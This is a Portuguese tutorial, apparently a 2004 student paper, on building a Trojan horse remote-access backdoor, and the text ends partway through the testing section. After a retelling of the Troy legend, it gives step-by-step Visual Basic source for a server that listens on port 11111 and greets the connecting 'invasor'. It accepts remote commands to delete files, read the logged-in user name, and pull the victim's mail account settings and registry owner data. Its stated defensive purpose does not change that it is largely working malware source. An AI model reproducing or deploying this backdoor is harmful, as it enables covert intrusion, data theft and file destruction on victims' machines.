Guilherme Cestarolli Seleguim - cestarolli@puccampinas.edu.br / gseleguim@ig.com.br

Tamanho: px
Começar a partir da página:

Download "Guilherme Cestarolli Seleguim - cestarolli@puccampinas.edu.br / gseleguim@ig.com.br"

Transcrição

1 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS Visual Basic - Delphi Versão Simplificada por Guilherme Cestarolli Seleguim Janeiro-2004

2 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 2 Saia do ócio Não caia no óbvio Não quero ter um sócio Eu quero um antídoto Pra viver melhor O RAPPA Greetings to: Men At Work Pennywise Placebo The Cranberries Millencolin NOFX No Fun At All Sublime Abanã Reggae Roots Band 311 ICS Jundiaí Interior Connected Style InLine Brothers VideoGroove Video Magazine MindGame DayleBread Magazine Douglas Brother Japanese Style Friend Rest in peace. Berça Brother Rasta Style Friend Rest in peace. Cesar Mora Carlos Pianowski FruitBooter Sick Section TRS Alex Broskow Razors Shima Senate Kill Team X-Games Michael Ende Barbi s Family Croci Costa s Family My Family J. M. Barrie Cap. Charles Johnson (Pirates between ) Flat Spin 540º True Spin Fish Bone Torque Slide 720º Double Grab PUC-Campinas Revista Fluir Revista Hardcore Surf Adventures Evertinho s Sick Adventures In The Night And all the girls......

3 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 3 Sumário Resumo Abstract Lista de Figuras INTRODUÇÃO Introdução A Lenda do Cavalo de Tróia Análise Histórica versus Análise Computacional CONSTRUINDO O SERVIDOR EM VISUAL BASIC Layout FrmMain TxtInfo Server CODIFICAÇÃO DO SERVIDOR EM VISUAL BASIC General Declarations Private Function Banner ( ) As String Private Function Del (sfile as String) As String Private Function GetCurrentUserName ( ) As String Private Function GetMailInfo ( ) As String Private Function Help ( ) As String Private Function MSG (smsg as String) As String Private Function RegInfo ( ) As String Form_Load Private Sub Server_ConnectionRequest Private Sub Server_DataArrival Private Sub Server_Error TESTANDO O SERVIDOR EM VISUAL BASIC CONSTRUINDO O SERVIDOR EM DELPHI Layout FrmMain MInfo Server CODIFICANDO O SERVIDOR EM DELPHI Uses Private Declarations Function TfrmMain.Banner: String; Function TfrmMain.Del(sFile: String): String; Function TfrmMain.GetCurrentUserName: String; Function TfrmMain.GetMailInfo: String; Function TfrmMain.Help: String; Function TfrmMain.MSG(sMSG: String): String; Function TfrmMain.RegInfo: String; procedure TfrmMain.ServerClientConnect procedure TfrmMain.ServerClientDisconnect procedure TfrmMain.ServerClientRead procedure TfrmMain.ServerClientError REGISTRANDO O SERVIDOR PARA INÍCIO AUTOMÁTICO Registrando o servidor em Visual Delphi Procedure TfrmMain.FormCreate Registrando o servidor em Visual Basic Private Sub Form_Load... 36

4 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 4 Resumo Este documento trata sobre o desenvolvimento de software para acesso remoto conhecido como Cavalo de Tróia. As linguagens de programação utilizadas para este contexto são o Visual Basic 6 e o Delphi 5. O intuito para ambas as linguagens é construir um servidor que tenha as mesmas funcionalidades, para se ter como fazer uma comparação. Noções sobre redes de computadores são tratadas no escopo deste documento. Não serão tratadas funcionalidades específicas e normalmente comuns neste tipo de software como Transferência de Arquivos (Roubo de Informação), Formatação de Disco, Desligar / Reiniciar Sistemas Operacionais porque o foco é a construção da aplicação e não suas funcionalidades. Este documento tem por finalidade auxiliar Administradores de Redes e Administradores de Sistemas a entenderem melhor o funcionamento desse tipo de software que se bem utilizado e construído causa sérios danos a Comunidade da Internet e a Corporações diariamente. Invasão de Sistemas, Roubo e Destruição de Arquivos/Informação são crimes e de nenhuma maneira este documento visa sustentar estas atividades. Todo o software desenvolvido aqui é livre e pode ser copiado, modificado, distribuído sob os Termos da Licença Pública Geral GNU, desde que mantida nota sobre o autor original.

5 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 5 Abstract This document is about the development of remote access systems, well-known as Trojan Horses. The programming languages used for this purposes are Visual Basic 6 and Delphi 5. The purpose for both languages is to construct a server that has the same functionalities, for a comparisson to be possible. Computer Network Concepts are talked in this document s scope. Specific functionalities won t be discussed like File Transfer (Steal of Information), Disks Formatting, Restart / Shutdown Operational Systems because the focus is the application s construction and not it s functionalities. This document has the purpose of helping Network and Systems Administrators to understand better the way this kind of software works because it causes serious damages to the Internet Community and Corporations every day. Systems Invasion, Steal and Destruction of Files/Information are crime and in no way this document wants the keep this activities up. The software developed here is free, and can be copied, modified, distributed under the Terms of the General Public License GNU, since the original author would be kept.

6 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 6 Lista de Figuras 01 Helena Selecionando o tipo de projeto Alterando o nome do projeto O formulário padrão do Visual Basic Botão Save Project Salvando o formulário Salvando o projeto Adicionando Registry_Module.bas ToolBox do Visual Basic Adicionando ao projeto o Microsoft Winsock Control Layout de frmmain Verificando as portas locais Executando telnet Telnet conectado ao servidor Formulário padrão do Delphi Botão Save All da ToolBar Salvando a unit umain.pas Salvando o projeto TrojanServer.dpr Adicionando TServerSocket ao projeto Tela do servidor em Delphi Eventos de TServerSocket RegEdit Editor do Registro do Windows... 36

7 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 7 Introdução Software para Acesso Remoto são programas que permitem que uma pessoa tenha acesso ao seu sistema computacional sem que você perceba. Uma vez que este tipo de software esteja instalado, o invasor tem total acesso ao computador da vítima, dependendo das funcionalidades programadas. Para que esta invasão computacional funcione são necessários dois programas: um servidor e um cliente. O software servidor é cuidadosamente programado para ter as funcionalidades que o invasor deseja, sejam elas destrutivas ou para roubo de informação. O software cliente é construído para se conectar ao software servidor e pedir para que ele execute suas funcionalidades. Depois de escolhida a vítima, o atacante (Hacker, Cracker, ou a nomenclatura que desejar para o invasor) envia o programa servidor para a vítima, seja este envio por , instant messanger ou mesmo localmente. Uma vez executado o programa servidor na máquina alvo ele tem algumas tarefas a fazer antes de liberar o acesso remoto. Normalmente ele cria um diretório de nome aleatório para que seja mais difícil sua identificação e se auto-copia para este diretório e também se auto-renomeia. Depois disso, adiciona uma entrada na área de programas para inicialização automática no Sistema Operacional, para que o programa servidor seja iniciado toda a vez que o Sistema Operacional for ligado. Uma porta é aberta para que se possa fazer o acesso remoto. As portas são identificadas por números entre 0 e O atacante então inicia seu programa cliente e neste entra com o endereço IP e o número da porta para conexão. Se a conexão for bem sucedida as funcionalidades do servidor estão expostas para o atacante decidir o que quer fazer.

8 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 8 A Lenda do Cavalo de Tróia A bela Helena (filha do Rei Píndaro de Esparta e casada com Menelau) quando foi raptada por Páris (filho do Rei Príamo de Tróia), gerou a famosa guerra entre gregos e troianos narrada no poema épico "ilíada" escrito por Homero, a obra foi traduzida com esse nome pois Tróia era chamada pelos latinos de "ilion". No lado grego, a exaustão faz sentir-se amargamente. São dez anos desde que deixaram a pátria para reaver Helena, mas, apesar de todas as mortes e sofrimentos, Tróia continua inconquistável. fig. 01 Helena. Esquecendo o antigo entusiasmo, os mais cansados já falam em voltar para casa. Está mais que na hora de fazer alguma coisa, e se a força não consegue, talvez a astúcia seja a solução. Pelo menos, essa é a convicção de Ulisses. Pacientemente, ele arquiteta um plano que é aceito pelo rei Agamenon. Algum tempo mais tarde, enquanto todos os gregos dormem; um homem esgueira-se entre as tendas e escapa da vigilância dos sentinelas. Muito ferido, deixa o acampamento e, mancando, dirige-se a Tróia. Ao chegar às portas da cidade, faz tanta algazarra que os vigias, apesar de desconfiados, acabam abrindo-as. O desconhecido conta sua história: Eu me chamo Sínon e era prisioneiro dos gregos. O esperto Ulisses e Agamenon reduziram-me ao lamentável estado em que me encontro. Mas consegui fugir e suplico que me dêem asilo. O homem é levado a Príamo, o qual, após ouvi-lo, resolve oferecer-lhe a hospitalidade e os cuidados de que necessita. O velho e sábio soberano de Tróia nem desconfia de que Sínon, primo de Ulisses, é um espião e está ali para destruir a cidade. De manhã, do alto das muralhas os habitantes de Tróia se surpreendem: as tendas e os navios gregos desapareceram. Até onde a vista alcança, não há mais nenhum vestígio da presença dos aqueus. No entanto, diante da maior porta da cidade ergue-se um cavalo de madeira gigantesco.

9 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 9 Mandam buscar Sínon, na esperança de que ele possa explicar aquela situação esquisita. O espião engana-os dizendo que os gregos, cansados de lutar inutilmente, voltaram para sua terra natal. O cavalo seria apenas um meio de tentar garantir sua segurança durante a viagem marítima de volta para casa: enquanto o cavalo ficar fora da cidade, os aqueus serão poupados das tempestades, mas, se o cavalo entrar em Tróia, toda a frota grega naufragará. Os troianos dão gritos de alegria. Vão enfim poder vingar-se daqueles que os fizeram sofrer durante dez anos. Abrem os pesados portões e apressam-se em trazer para dentro o cavalo. Os troianos começam a trabalhar, uns empurrando e outros puxando o animal. Ao fim de muito esforço, o colossal cavalo chega dentro da cidade. Quando a noite cai, os troianos vão dormir. Enquanto descansam, abre-se no ventre do cavalo um alçapão habilmente escondido. Do corpo oco do cavalo saem os melhores guerreiros gregos. Acompanhados de Sínon, vão à entrada de Tróia, livram-se dos sentinelas e abrem as portas. Armados da cabeça aos pés, os aqueus penetram na cidade. O plano de Ulisses é um sucesso: a partida dos gregos era uma farsa, e os navios voltaram com a escuridão. Os gregos lançam-se sobre os adormecidos troianos. É uma carnificina. O velho Príamo e seus filhos são passados pelo fio da espada. Resistir é impossível, pois os troianos nem ao menos conseguem reunir-se para enfrentar o inimigo. Os gregos tornam-se senhores de Tróia e não deixam vivo um só homem. As mulheres e as crianças passam a ser escravas dos vencedores. Quando amanhece, a cidade antes gloriosa, está reduzida a um monte de cinzas e escombros. Nasce então a expressão presente de grego. No meio de toda essa desolação, um homem está no auge da felicidade: Menelau. Finalmente recuperou Helena! Até hoje não se sabe realmente se o cavalo existiu ou é apenas uma lenda, porém, até 1870 não se acreditava nem na existência de Tróia, até que Schliemann, um comerciante alemão, redescobriu as ruínas da cidade (e suas jóias de ouro) na atual Colina de Hissarlik (Turquia). Os estudos arqueológicos indicam que existiram nove cidades sobrepostas. A mais antiga é datada aproximadamente em a.c. e a última é do ano 400 d.c. quando Tróia era a colônia

10 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 10 romana chamada "ilium novum". Na época da Guerra a cidade vivia sob a influência dos hititas, civilização que rivalizava com os gregos. Mesmo que lendário, o cavalo de Tróia nos passa a mensagem de que nem sempre uma guerra é vencida com armas, as vezes, a astúcia (e um presente de grego) é mais importante.

11 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 11 Análise Histórica versus Análise Computacional Na Mitologia, Ulisses desenvolveu todo o plano do Cavalo de Tróia. Mas quem são os autores desses temidos programas que tanto assolam a Internet? Na maioria das vezes são pessoas que conhecem muito bem sobre redes de computadores, linguagens de programação e sistemas operacionais, comumente conhecidos como Hackers e Crackers. Mas atualmente, ninguém precisa ser um Hacker ou Cracker de alto nível para poder construir um Cavalo de Tróia. Com a inúmera quantidade de informações disponíveis para pesquisa e Linguagens de Programação visuais e orientadas a objeto, que encapsulam toda a complexidade da programação dentro de componentes, o desenvolvimento se torna muito rápido. Se os gregos tivessem todos esses recursos somados à um notebook ligado à Internet, teriam acabado com a guerra contra Tróia muito antes dos dez longos anos de sua duração... Provavelmente, após Ulisses ter tido a idéia do Cavalo de Tróia, ele procurou meios para construí-lo. Fez um pequeno rascunho do formato e das dimensões. Mandou chamar os melhores marceneiros e lhes explicou o que deviam fazer. Buscaram então madeira, pregos e martelos e assim, começaram a construção. Essa pode ter sido a maneira escolhida por Ulisses para construí-lo. Como é então construído o Cavalo de Tróia para um ambiente computacional? Da Mitologia à atualidade muito tempo se passou e as ferramentas de desenvolvimento também não são as mesmas. As ferramentas, antes rudimentares e de produção artesanal usadas pelos gregos na época se transformaram em poderosas Linguagens de Programação. Podemos citar aqui algumas delas, como por exemplo: Java, C++, Kylix, Delphi, Visual Basic, dentre tantas outras disponíveis no mercado. Analisando os motivos da lendária guerra contra Tróia, percebemos que esta se deu devido ao rapto de Helena pelos troianos, incentivando os gregos à batalharem para resgatá-la. Após muitos anos de guerra, a astúcia do grego Ulisses foi posta à prova, quando então teve a brilhante idéia do Cavalo de Tróia. Portanto os gregos tinham um objetivo muito claro: resgatar Helena e vingar a morte de milhares de soldados nos dez anos de batalha. Mas aqui chegamos num ponto crítico de nossa analogia: Onde está o servidor de nome Helena que precisa ser salvo? Sabemos que em um ambiente computacional não podemos fazer a mesma comparação. Porém, Security Officers de toda a parte do mundo sabem muito bem porque

12 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 12 Hackers e Crackers atacam. Quase nunca têm objetivos concretos como o dos gregos e na grande maioria fazem tudo por pirraça. Mas infelizmente estamos compartilhando um mundo muito diversificado e nesta rede mundial de computadores, não nos deparamos apenas com garotinhos inteligentes. Quando se trata do uso de Cavalos de Tróia por Hackers e Crackers, um dos motivos que me vêm à mente é o da Espionagem Industrial. Numa época de tanta competitividade, o knowhow é imprescindível para tomadas de decisões, que refletirão no desempenho das corporações para os próximos anos. Portanto, se a minha empresa souber das estratégias da sua, poderei usar as suas informações e tirar proveito da situação, saindo na frente numa disputa de mercado, num determinado segmento de produtos por exemplo. A aplicação de um Cavalo de Tróia pode ter inúmeros motivos mas Security Officers, Administradores e mesmo usuários domésticos devem ter grande atenção para um ponto de extrema importância: Você percebe que está infectado por vírus devido à alterações no comportamento de seu Sistema Operacional, mas quando um Cavalo de Tróia está instalado, o invasor está conectado, roubando seus arquivos e você nem imagina o que está realmente acontecendo.

13 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 13 Construindo o Servidor em Visual Basic Layout Aqui começaremos a construção de nosso programa servidor em Visual Basic. Tentarei explicar Step-by-Step para que o entendimento seja imediato e progressivo. Abra a IDE do Visual Basic e escolha um novo projeto Standard EXE, como mostrado na figura abaixo. fig. 02 Selecionando o tipo de projeto. Altere o nome do projeto para Backdoor, como mostrado na figura abaixo: fig. 03 Alterando o nome do projeto. Dica: A tecla de atalho para se acessar a Janela de Propriedades dos componentes ( Properties Window ) é a F4. Quando iniciamos um novo projeto Standard EXE, automaticamente o Visual Basic cria um formulário padrão para que possamos começar a construir nossa aplicação.

14 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 14 fig. 04 O formulário padrão do Visual Basic. frmmain Clique sobre o formulário e depois pressione a tecla F4 para ser exibibida a janela de propriedades e altere as propriedades à seguir: Name: frmmain; Border Style: 1 Fixed Single Caption: Visual Basic - Backdoor Server Height: 2940; Width: 7080; A propriedade Name do formulário representa como o formulário será representado dentro do Projeto. Nota-se que não é permitido que haja dois formulários com o mesmo nome em um mesmo projeto por se tratar de um identificador único (chave). A propriedade Height contém a Altura do formulário em tela. A propriedade Width, por sua vez, contém a Largura do formulário em tela. A propriedade Caption contém a descrição que aparecerá na barra de título do formulário. A propriedade Border Style representa o Estilo da Borda do formulário e 1 Fixed Single significa que a borda de nosso formulário será fixa e não poderá ser dimensionada. As outras possíveis opções para esta propriedade são None, Sizable, Fixed Dialog, Fixed Tool Window, Sizable Tool Window. Basta alterar entre estas opções para visualizar a diferença. Agora salve seu trabalho através do menu File->Save Project ou através do botão Save Project da ToolBar.

15 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 15 fig. 05 Botão Save Project. Salve o formulário com o nome de frmmain.frm. fig. 06 Salvando o formulário. Salve o projeto com o nome de Backdoor.vbp. fig. 07 Salvando o Projeto. Utilizaremos neste projeto acesso ao Registro ( Registry ) do Windows. Para isso dispomos de um módulo (poderia ser uma classe para implementar Orientação a Objeto) já codificado e de código livre escrito por John Powell em 12/04/2001, disponível em < Portanto baixe este módulo e o adicione ao projeto através das teclas de atalho CTRL+D.

16 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 16 fig. 08 Adicionando Registry_Module.bas. Adicione um componente TextBox ao formulário, que se encontra na ToolBox e altere as seguintes propriedades: TxtInfo fig. 09 ToolBox do Visual Basic. Name: txtinfo; Height: 2535; Left: 0; Top: 0; Locked: True; Multline: True; Scrollbars: 2 Vertical; Width: 6945; As propriedades Left e Top se referem ao posicionamento do TextBox dentro do formulário. A propriedade Locked se refere ao Travamento do TextBox quanto a edição. Se Locked estiver False então é possível que o usuário digite conteúdo no TextBox. Como o objetivo de txtinfo é apenas informativo mantemos Locked com o valor True. A propriedade Multline diz se o usuário poderá digitar texto com várias linhas. A propriedade Scrollbars indica se o TextBox terá Barras de

17 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 17 Rolagem, o valor 2 Vertical indica que terá apenas barras verticais. As outras opções para esta propriedade são None, Horizontal e Both. Agora adicionaremos o componente que irá fazer a comunicação via rede, o Microsoft Winsock Control 6.0. Para isso utilize a seqüência de menus Project -> Components, ou se preferir a tecla de atalho para os componentes é a CTRL+T. fig. 10 Adicionando ao projeto o Microsoft Winsock Control 6.0. Marque o componente Microsoft Winsock Control 6.0 e clique sobre o botão Aplicar. Após isto o componente aparece na ToolBox, basta então adiciona-lo ao formulário. O formulário deverá ficar parecido com a figura à seguir: fig. 11 Layout de frmmain. Agora vamos configurar as propriedades do Winsock como abaixo:

18 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 18 Server Name: Server; LocalPort: 11111; Protocol: 0 - scktcpprotocol; A propriedade LocalPort indica qual a porta local que será utilizada para a comunicação entre os computadores. A propriedade Protocol indica qual o protocolo será utilizado para comunicação. Se usado o TCP existe conexão entre os computadores entre outras vantages, se for usado o UDP não. Codificação do Servidor em Visual Basic Vamos agora para a parte de codificação de nosso servidor. Na seção General Declarations do formulário insira o código: General Declarations Option Explicit Dim scommand As String Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpbuffer As String, nsize As Long) As Long scommand é a variável que conterá o comando a ser executado pelo servidor, que é enviado pelo cliente que está conectado. A função GetUserName é uma API do Windows usada para retornar o nome do usuário corrente no Windows. Agora iremos escrever as funções utilizadas no servidor como seguem: Private Function BANNER( ) As String Private Function BANNER() As String BANNER = " " & vbcrlf & vbcrlf BANNER = BANNER & " Visual Basic - BACKDOOR SERVER " & vbcrlf BANNER = BANNER & " Version Internet.Zero.Polar.Age " & vbcrlf BANNER = BANNER & " Developed by Guilherme Cestarolli Seleguim " & vbcrlf BANNER = BANNER & " Welcome Invasor! Type Help for the list of commands " & vbcrlf BANNER = BANNER & " " & vbcrlf & vbcrlf BANNER = BANNER & "BACKDOOR->" End Function

19 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 19 Quando algum cliente se conectar ao nosso servidor este banner de apresentação será exibido. Private Function DEL(sFile as String) As String Private Function DEL(sFile As String) As String On Error GoTo err_del Kill (sfile) DEL = "The file " & sfile & " was deleted." & vbcrlf DEL = DEL & "BACKDOOR->" Exit Function err_del: DEL = "The file " & sfile & " could not be found." & vbcrlf DEL = DEL & "BACKDOOR->" End Function Quando solicitada a deleção de um arquivo pelo cliente, o servidor irá utilizar esta função para faze-lo. Para apagar um arquivo utilizando o VB usamos o procedimento Kill (FileName). Se ao passar por esta rotina não houver erro algum, então o arquivo foi apagado. Caso haja algum erro o arquivo não foi apagado. Private Function GetCurrentUserName( ) As String Private Function GetCurrentUserName() As String Dim suser As String Dim sbuffer As String Dim lsize As Long sbuffer = Space$(255) lsize = Len(sBuffer) Call GetUserName(sBuffer, lsize) If lsize > 0 Then suser = Left$(sBuffer, lsize) Else suser = vbnullstring End If GetCurrentUserName = suser & vbcrlf GetCurrentUserName = GetCurrentUserName & "BACKDOOR->" End Function Quando solicitado o usuário corrente do Windows pelo cliente, o servidor irá utilizar esta função para faze-lo. Private Function GetMailInfo( ) As String Private Function GetMailInfo() As String Dim AccountStr As String AccountStr = QueryValue(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager", "Default Mail Account") If (AccountStr <> "") Then

20 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 20 GetMailInfo = "Account Name: " & QueryValue(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager\Accounts\" + AccountStr, "Account Name") & vbcrlf GetMailInfo = GetMailInfo & "POP3 Server: " & QueryValue(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager\Accounts\" + AccountStr, "POP3 Server") & vbcrlf GetMailInfo = GetMailInfo & "POP3 User Name: " & QueryValue(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager\Accounts\" + AccountStr, "POP3 User Name") & vbcrlf GetMailInfo = GetMailInfo & "SMTP Server: " & QueryValue(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager\Accounts\" + AccountStr, "SMTP Server") & vbcrlf GetMailInfo = GetMailInfo & "SMTP Display Name: " & QueryValue(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager\Accounts\" + AccountStr, "SMTP Display Name") & vbcrlf GetMailInfo = GetMailInfo & "SMTP Address: " & QueryValue(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager\Accounts\" + AccountStr, "SMTP Address") & vbcrlf GetMailInfo = GetMailInfo & "BACKDOOR->" Else GetMailInfo = "Couldn't retrieve information." & vbcrlf GetMailInfo = GetMailInfo & "BACKDOOR->" End If End Function Quando solicitadas informações de pelo cliente, o servidor irá utilizar esta função para faze-lo. Private Function Help ( ) As String Function HELP() As String HELP = "Available commands for this version are listed below:" & vbcrlf HELP = HELP & "HELP (Shows available commands)" & vbcrlf HELP = HELP & "MSG (Sends message. Example: MSG Message)" & vbcrlf HELP = HELP & "USER (Retrieve information about remote user)" & vbcrlf HELP = HELP & "DEL (Deletes a file. Example: DEL PathOfFile)" & vbcrlf HELP = HELP & "REGINFO (Retrieve Registry Information)" & vbcrlf HELP = HELP & "MAILINFO (Retrieve Mail Information)" & vbcrlf HELP = HELP & "QUIT (Disconnects from the server)" & vbcrlf HELP = HELP & "BACKDOOR->" End Function Quando solicitadas as funções que o servidor executa, o servidor irá utilizar esta função para faze-lo. Private Function MSG(sMSG As String) As String Private Function MSG(sMSG As String) As String MSG = "The message was delivered" & vbcrlf MSG = MSG & "BACKDOOR->" MsgBox smsg, vbokonly, "You received a message!" End Function Quando o cliente quiser enviar uma mensagem para o servidor, o servidor irá utilizar esta função para faze-lo. Private Function RegInfo ( ) As String Private Function RegInfo() As String

21 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 21 'Tries to get Windows 9x info On Error Resume Next RegInfo = "Trying to get Win9x Info..." & vbcrlf RegInfo = RegInfo & "Windows 9x" & vbcrlf RegInfo = RegInfo & "Product Name: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", "ProductName") & vbcrlf RegInfo = RegInfo & "Version Number: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", "VersionNumber") & vbcrlf 'Tries to get Windows NT info RegInfo = RegInfo & "" & vbcrlf RegInfo = RegInfo & "Trying to get Windows NT Info..." & vbcrlf RegInfo = RegInfo & "Windows NT" & vbcrlf RegInfo = RegInfo & "Product Name: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "ProductName") & vbcrlf RegInfo = RegInfo & "CSD Version: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "CSDVersion") & vbcrlf RegInfo = RegInfo & "Current Version: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "CurrentVersion") & vbcrlf RegInfo = RegInfo & "Current Build: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "CurrentBuild") & vbcrlf RegInfo = RegInfo & "Current Build Number: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "CurrentBuildNumber") & vbcrlf RegInfo = RegInfo & "Current Type: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "CurrentType") & vbcrlf RegInfo = RegInfo & "Product ID: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "ProductId") & vbcrlf RegInfo = RegInfo & "Registered Organization: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "RegisteredOrganization") & vbcrlf RegInfo = RegInfo & "Registered Owner: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "RegisteredOwner") & vbcrlf RegInfo = RegInfo & "Path Name: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "Pathname") & vbcrlf RegInfo = RegInfo & "Source Path: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "Source Path") & vbcrlf RegInfo = RegInfo & "System Root: " & QueryValue(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\", "System Root") & vbcrlf RegInfo = RegInfo & "BACKDOOR->" End Function Quando o cliente quiser verificar informações do Registro do Windows, o servidor irá utilizar esta função para faze-lo. Form_Load Private Sub Form_Load() Server.Listen End Sub O método Listen do componente Server faz com que abra a porta definida na propriedade Port e fique escutando ( listening ), aguardando conexões. Portanto, no start do programa, o servidor ficará aguardando conexões. Agora iremos programar os eventos do componente Server.

22 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 22 Private Sub Server_ConnectionRequest (ByVal requestid As Long) Private Sub Server_ConnectionRequest(ByVal requestid As Long) txtinfo.text = txtinfo.text & "The machine " & Server.RemoteHostIP & " is trying to connect to me..." & vbcrlf If Server.State <> sckclosed Then Server.Close Server.Accept requestid Server.SendData (BANNER) If Server.State = sckconnected Then txtinfo.text = txtinfo.text & "Connected to " & Server.RemoteHostIP & vbcrlf End If End Sub Este método é invocado quando algum cliente está tentando se conectar, então adicionamos no txtinfo a informação de qual cliente está tentando se conectar, através da propriedade RemoteHostIP, que mostra o IP do computador remoto. O método Accept é utilizado para aceitarmos a conexão do cliente. Logo após aceitarmos a conexão é enviado o nosso banner, através do método SendData, que é utilizado sempre que queremos enviar dados ao cliente. Private Sub Server_DataArrival (ByVal bytestotal As Long) Private Sub Server_DataArrival(ByVal bytestotal As Long) Dim smsg As String Dim saction, sparameter As String Dim iposspace As Integer Server.GetData smsg, vbstring If smsg = vbcrlf Then iposspace = InStr(1, scommand, " ") 'There is a parameter If iposspace > 0 Then saction = Mid(sCommand, 1, iposspace - 1) 'Delete(sCommand, 1, iposspace) sparameter = Mid(sCommand, iposspace + 1) Else saction = scommand End If 'Typed MSG If UCase(sAction) = "MSG" Then scommand = "" Server.SendData (MSG(sParameter)) 'Typed QUIT ElseIf UCase(sAction) = "QUIT" Then Server.SendData ("Connection terminated...") Server.Close 'Typed HELP ElseIf UCase(sAction) = "HELP" Then scommand = "" Server.SendData (HELP) 'Typed DEL

23 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 23 ElseIf UCase(sAction) = "DEL" Then scommand = "" Server.SendData (DEL(sParameter)) 'Typed REGINFO ElseIf UCase(sAction) = "REGINFO" Then scommand = "" Server.SendData (RegInfo) 'Typed MAILINFO ElseIf UCase(sAction) = "MAILINFO" Then scommand = "" Server.SendData (GetMailInfo) 'Typed USER ElseIf UCase(sAction) = "USER" Then scommand = "" Server.SendData (GetCurrentUserName) 'Typed a non-existant command Else Server.SendData ("Command not recognized." & vbcrlf) Server.SendData ("BACKDOOR->") scommand = "" End If 'Typed a word different than BackSpace ElseIf Asc(sMSG) <> 8 Then scommand = scommand + smsg 'Typed BackSpace Else End Sub End If If Len(sCommand) = 0 Then Server.SendData (vbcr & "BACKDOOR->") Else scommand = Mid(sCommand, 1, Len(sCommand) - 1) End If Este método é invocado quando algum cliente envia dados ao servidor. Guardamos a informação enviada na variável smsg através do método GetData. Guardamos na variável saction o comando enviado e se houver um parâmetro para este comando guardamos ele em sparameter. Verificamos o comando e se for válido executamos a função referenciada implementando assim um protocolo de comunicação. Private Sub Server_Error( ) Private Sub Server_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) Dim smsg As String smsg = "An error ocurred with the socket component." & vbcr & _

24 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 24 "Error Number: " & Number & vbcr & _ "Description : " & Description & vbcr & _ "Code : " & Scode & vbcr & _ "Source : " & Source txtinfo.text = txtinfo.text & vbcr & smsg & vbcr End Sub Este método é invocado quando algum erro for lançado proveniente do componente Winsock. Testando o Servidor em Visual Basic Compile o projeto com as teclas CTRL+F5 para verificar erros de sintaxe. Agora com o programa em execução vá no Prompt do MS-DOS e digite netstat an e note que a porta já está aberta esperando conexões. fig. 12 Verificando as portas locais. A opção a do netstat exibe as conexões atuais e as portas em estado listening (aguardando conexões). A opção n exibe endereços e portas no formato numérico. A seguir as opções para netstat: netstat [-a] [-e] [-n] [-s] [-p protocolo] [-r] [intervalo] -a Exibe conexões atuais e as portas em estado LISTEN aguardando conexões. -e Exibe estatísticas Ethernet. -n Exibe no formato numérico endereços IP e portas. -s Informações agrupadas por protocolo.

